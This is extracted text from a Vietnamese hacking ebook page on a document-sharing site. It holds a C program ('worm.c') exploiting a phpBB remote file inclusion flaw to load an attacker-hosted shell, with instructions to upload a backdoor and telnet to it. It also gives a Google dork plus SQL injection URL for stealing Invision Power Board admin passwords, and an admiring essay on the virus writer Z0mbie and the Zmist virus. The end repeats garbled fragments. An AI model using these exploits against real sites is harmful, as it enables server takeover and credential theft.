1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 285 ppt

5 134 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 5
Dung lượng 174,8 KB

Nội dung

sockfd = socket(AF_INET, SOCK_STREAM, 0); request = (char *) malloc(1024); trg.sin_family = AF_INET; trg.sin_port = htons(80); trg.sin_addr = *((struct in_addr *) he->h_addr); memset(&(trg.sin_zero), '\0', 8); connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr)); sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?c md=w\n",argv[1],argv[2],argv[3]); send(sockfd,request,strlen(request),0); buff=recv(sockfd, buffer, 1024-1, 0); buffer[buff] = '\0'; printf("%s",buffer); close(sockfd); return 0; } void help(char *program_name) { printf("worm.c by evilrabbi for shell\n\n"); printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name); printf("%s www.example.com phpBB2 blah.com/shell.php.php\n",program_name); } Usage: Code: exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o worm worm.c ./worm <url_to_system> <phpbb_dir> <url_to_shell.php> telnet <url_of_exploited_system> <port_of_back_door> Trong đó file shell.php include 1 con backdoor : example r0nin , bindz Code: r0nin > 1666 bd > 6969 crond > 666666 44464 > 44464 dc.pl > 2121 0days release by clarken . Tobe continue @clarken(HCE) Tutorial from Clarken (bài 4) 1 bài về Virus này: Theo tạp chí Conmaz: Trong giới vxer (virus writer - người viết virus), người đi tiên phong về mặt kỹ thuật hoặc tiên phong về mặt ý tưởng sáng tạo luôn luôn được đánh giá cao và sự thán phục của các vxer khác. Dark Avenger đã đi vào lịch sử virus máy tính với tư cách là người đầu tiên tạo ra một polymorphism engine hoàn chỉnh. Còn hai anh em người Pakistan được biết đến khi họ đưa ra boot virus đầu tiên. Ngày nay, trong giới vxer, mọi người đều biết tới nhóm 29a (http://vx.netlux.org/29a/) như một nơi tập hợp gần như nhiều vxer sừng sỏ nhất thế giới: GriYo, Benny, Vallez, Vecna, rog g biv. Và, có một người nữa thuộc 29a, một người mà khi nhắc đến, cả những aver (antivirus man - người chống virus) như Peter Szor (Symantec) cũng phải nể phục. Đó là Z0mbie. Z0mbie đầu tiên được biết tới với những virus trên nền DOS. Sự khác biệt giữa các virus của Z0mbie là không bao giờ mang các payload mang tính phá hoại, mà nhìn vào các virus này, người ta chỉ thấy sự tìm tòi và đầy chất sáng tạo. Z0mbie đã tìm ra không ít các kỹ thuật mới, lần đầu tiên được sử dụng trong DOS virus như sử dụng Shadow RAM memory và video font để lưu trữ mã virus (virus Z0mbie.VPI http://www.viruslist.com/en/viruses/ virusid=12846), hoặc thiết kế tối ưu các phương pháp mới cho virus trên nền DOS Mọi người ở bên ngoài sẽ không hiểu và chắc chắn là thấy kỳ quái: tại sao lại có những người thích ngồi viết những thứ linh tinh, lăng nhăng phá hoại người khác như virus? Câu trả lời là, đừng thành kiến như vậy. Những người viết virus phân ra làm 2 loại: chuyên tâm về thiết kế kỹ thuật mới và loại thích phá hoại. Những người chuyên tâm về thiết kế kỹ thuật cho virus chỉ quan tâm tới các kỹ thuật, thuật toán sao cho gây khó khăn cho aver nhất và sau khi viết xong virus như vậy, họ không để chúng lây lan mà gửi mẫu các virus này tới các công ty chuyên chống virus. Các virus này gần như 100% không mang tính phá hoại (xoá file, ghi đè dữ liệu, ghi đè EEPROM ). Nó giống như một cuộc chơi giữa Aver và Vxer vậy. Việc viết virus của họ giống như sở thích, để tìm tòi, nghiên cứu các kỹ thuật nâng cao, và công bằng mà nói, họ hoàn thiện các sản phẩm chống virus. Tuy nhiên, mọi người hầu như chỉ nhìn thấy mặt trái của vấn đề. Đó là khi loại người viết virus thứ hai xuất hiện. Những kẻ viết virus này thường không sáng tạo ra kỹ thuật mà chỉ sử dụng các payload độc hại để mọi ngưòi chú ý tới virus của mình. Tiếc thay, số người này đông gấp vạn lần những vxer “whitehat” (mũ trắng). Hậu quả là ai cũng giữ định kiến: virus là phá hoại, virus là xoá dữ liệu, giết máy tính Thật đáng buồn. Z0mbie và nhóm 29a thuộc về nhóm người sáng tạo kỹ thuật. Các thành viên của 29a luôn nổi tiếng trong giới nhờ những kỹ thuật họ phát minh ra như EPO (Entry Point Obsucring) (GriYo), virus trên DTDĐ (Vallez), .NET virus đầu tiên (Benny), virus 64bit đầu tiên (rog g biv), virus có plug-in đầu tiên (Vecna) Z0mbie, giữ kỷ lục trong tay với vô số các engine cho virus về polymorphic, code-generator và thậm chí cả metamorphic. Khi Windows 32bit xuất hiện và thế chỗ cho DOS 16bit, hàng loạt các vxer thay nhau biến mất do không thích nghi được với môi trường mới. Đối với Z0mbie thì khác. Z0mbie thậm chí không dừng hoạt động nghiên cứu sáng tạo của mình mà còn trở nên nổi tiếng hơn với một loạt công trình mới. Trong giai đoạn đầu của Windows 32bit (dòng Windows 9x), kỹ thuật để cài virus vào ring0 được Z0mbie khai thác triệt để với cực nhiều kỹ thuật mới: qua IO port, qua IDT callgate, LDT callgate, qua lỗi API trên Windows, qua chỉnh sửa context, exploit ngắt 0Eh/2Eh, exploit VMM. Nhớ rằng, vào thời gian này, phương pháp duy nhất mà vxer dùng để load virus vào ring0 trên win9x là IDT callgate (virus CIH sử dụng kỹ thuật này). Hoặc, bài viết về access pagetable trong môi trường ring3 cũng là một cú sốc dành cho dân coder am hiểu về lập trình hệ thống. Z0mbie và Super (thành viên cũ của nhóm 29a) chính là 2 người chiến thắng trong cuộc thi virus với kích thước nhỏ nhất cho Windows 95. Z0mbie có khá nhiều bài viết công bố các phát hiện của mình trên hệ điều hành “lỗi thủng lỗ chỗ” này. Các lĩnh vực nghiên cứu của Z0mbie về virus rất rộng lớn và mọi người thực sự phải khâm phục khả năng làm việc và sự đam mê của coder này. Nếu đã nghiên cứu về virus, bạn sẽ thấy rằng, để có một gia tài như Z0mbie, bạn phải mất rất nhiều công sức, kiên nhẫn, đọc, bắt tay vào mò mẫm và thất bại. Các engine “trâu bò” như MiSTFALL dù được code từ những năm 2000, đến nay là 2006, các phần mềm chống virus vẫn không thể chắc chắn 100% có thể phát hiện chúng. Gia tài của Z0mbie không chỉ giới hạn trong lĩnh vực virus, mà còn trải rộng sang lĩnh vực bảo mật. Z0mbie còn được biết đến như 1 tác giả của nhiều tiện ích dành cho hacker, 1 tác giả shellcode, 1 tác giả của các plug-in nén/giải-nén, 1 tác giả của các công cụ mã hoá, 1 người am hiểu Windows tới từng chi tiết nhỏ Đáng tiếc rằng, trang web cá nhân của Z0mbie hiện đã chết, chỉ còn lại cache được lưu lại trong Google, bạn hãy check cache này tại đây để xem sức làm việc phi thường của Z0mbie: http://64.233.179.104/search?q=cache nt=fi refox-a Một kiệt tác của Z0mbie mà cho đến nay, nhiều người nhắc lại vẫn phải thốt lên sự thán phục: virus W32.Zmist. Zmist xuất hiện năm 2000, với 1 engine được built-in: MiSTFALL. Được Peter Szor (trưởng nhóm nghiên cứu phát triển chiến lược cho Symantec Norton Antivirus) đánh giá là virus phức tạp nhất từ trước đến nay, Zmist qua mặt tất cả các chương trình chống virus với sự biến hình khủng khiếp. Zmist không phải là một virus nữa, mà là sự nhập hồn, nhập xác vào file bị nhiễm. Kỹ thuật này được gọi đúng với cách nó hoạt động: tích hợp mã. Zmist dùng MiSTFALL engine để biên dịch lại file nạn nhân thành các chỉ lệnh, sử dụng thuật toán phân tích để loại trộn virus vào xen kẽ các opcode của file nạn nhân, rồi thế vào đó bằng virus code, tính toán lại các khoảng trống tham vấn dữ liệu và xây dựng lại hoàn toàn host file này. Virus opcode được xây dựng theo hình thái hoàn toàn ngẫu nhiên. File sau khi bị lây nhiễm sẽ chỉ còn là cái vỏ, mà nội dung hoàn toàn khác. Một virus siêu biến hóa cùng một polymorphic decrytor. Kết quả là virus code và host code hoàn toàn lẫn lộn vào nhau theo thứ tự ngẫu nhiên và không có quy luật. Kết hợp cùng MiSTFALL còn là các opcode rác nằm xem kẽ khiến cho việc phát hiện một virus là cực kỳ khó khăn và không chính xác. Nó giống như film Matrix, khi đặc vụ Smith nhập vào những nạn nhân của hắn và từ đó điều khiển người khác. Tuyệt vời ở chỗ, file đó vẫn thi hành, không hề bị phá hủy, không xảy ra một lỗi nào, cứ như chưa từng có chuyện gì xảy ra vậy. Zmist như đã nói ở trên, cho đến nay vẫn còn là một thách thức với các chương trình chống virus. Nó là một “sinh vật” minh chứng cho khả năng tìm tòi và sáng tạo của những vxer mũ trắng. Z0mbie, dù chỉ là một người vô danh, không ai biết mặt, biết tên, song với tất cả những gì đã nghiên cứu và công bố, Z0mbie truyền tới tất cả những ai đã đang và sẽ nghiên cứu virus một niềm đam mê cháy bỏng, một tinh thần và nghị lực làm việc khó tin. Điều đó không chỉ áp dụng trong lĩnh vực virus nói riêng, mà còn áp dụng cho tất cả mọi người một thông điệp: “Hãy biết đam mê và mãi mãi khao khát học hỏi”. Một tinh thần hacker. @clarken(HCE) Tổng Hợp hack IBF (bài 1) Tut Cho Newbie Copy từ Vniss & VHS Hix vì thấy cái cảnh làm Newmem chán lắm rùi kô vào dc box mem nên em quyết định làm 1 cái để lên mem Kiến thức kô có nên đành đi copy mấy anh thông cảm IBF 1.x Bug ssi.php 1. Vào www.google.com.vn đánh từ khóa : Powered by Invision Power Board® v1.x Final © 2003 IPS, Inc. < ngoài ra cũng có thễ dùng khóa owered by Invision Power Board đễ tìm được nhiều hơn> Code: ssi.php?a=out&type=xml&f=- 1)AND%201=0%20UNION%20SELECT%20t.*,%20m.password%20as%20foru m_name,%20f.read_perms,%20f.password%20FROM%20ibf_members%20m,ibf _forums%20f,ibf_topics%20t%20WHERE%20m.id=1%20LIMIT%201/* . rộng sang lĩnh vực bảo mật. Z0mbie còn được biết đến như 1 tác giả của nhiều tiện ích dành cho hacker, 1 tác giả shellcode, 1 tác giả của các plug-in nén/giải-nén, 1 tác giả của các công cụ. tất cả mọi người một thông điệp: “Hãy biết đam mê và mãi mãi khao khát học hỏi”. Một tinh thần hacker. @clarken(HCE) Tổng Hợp hack IBF (bài 1) Tut Cho Newbie Copy từ Vniss & VHS Hix

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN